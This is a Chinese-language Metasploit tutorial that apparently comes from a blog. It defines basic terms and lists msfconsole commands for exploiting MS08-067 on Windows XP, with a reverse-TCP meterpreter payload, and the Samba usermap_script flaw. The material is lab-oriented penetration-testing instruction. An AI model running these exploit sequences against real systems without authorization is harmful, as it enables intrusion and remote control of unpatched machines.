您的位置:首页 > 编程语言 > ASP

Kali 渗透测试—Metasploit

2019-07-16 17:36 1511 查看

Metasploit 并不仅仅是一个工具软件,它是为自动化实施经典的、常规的,或复杂新颖的攻击提供基础设施支持的一个完整框架平台。
Metasploit 中提供了渗透攻击模块、攻击载荷和编码器来轻易实施一次渗透攻击,也可以更近一步编写执行更为复杂的攻击技术。

专业术语

  • 渗透攻击(Exploit)
    渗透攻击是指有攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞,所进行的攻击行为。

  • 攻击载荷(Payload)
    攻击载荷就是我们期望目标系统在本渗透攻击之后去执行的代码,在Metasploit 框架中可以自由地选择、传送和植入。

  • Shellcode
    Shellcode 是指在渗透攻击时作为攻击载荷运行的一组机器指令。

  • 模块(Module)
    一个模块是指Metasploit 框架中所使用的一段软件代码组件。

  • 监听器(Listener)
    监听器是Metasploit 中用来等待连入网络连接的组件。
    目录

启动MSF

  • 命令行
    # msfconsole
  • 图形界面
    # armitage

msf > show exploits
这个命令会显示Metasploit 框架中所有可用的攻击模块。

msf > show auxiliary
这个命令会显示所有辅助模块以及它们的用途。

msf >search xxx
搜索某个模块

use xxx
使用某个模块

msf > show payloads
显示出payloads

msf > show options
参数是保证Metasploit 框架中各个模块正确运行所需的各种设置

msf > show targets
Metasploit 的渗透攻击模块通常可以列出受到漏洞影响目标系统的类型。举例来说,针对MS08_067漏洞的攻击依赖于硬编码的内存地址,所以这个攻击仅针对特定的操作系统版本,且只适用于特定的补丁级别、语言版本以及安全机制实现。

info
显示本模块的详细信息。
目录

MS08_067 的利用

环境说明

@ 攻击机
Kali
@ 靶机
172.18.11.28

相关命令

# nmap -sT -A --script=smb-vuln-ms08-067.nse -P0 10.10.10.130
# msfconsole 启动metasploit
msf > search ms08-067(是中横线,不是下划线)
msf > use exploit/windows/smb/ms08_067_netapi
msf > set payload windows/meterpreter/reverse_tcp (任选其一)
msf > set payload generic/shell_reverse_tcp (任选其一)
msf > show targets
msf > set target 7(选择window XP SP3)
msf > show options
msf > set RHOST 目标IP
msf > set LHOST 本机IP
msf > set LPORT 本机端口未被占用
msf > exploit

远程溢出Samba

环境说明

@ 攻击机
Kali
@ 靶机
10.10.10.254

相关命令

msf > use exploit/multi/samba/usermap_script
msf > show options
msf > set RHOST 目标地址
msf > exploit

内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: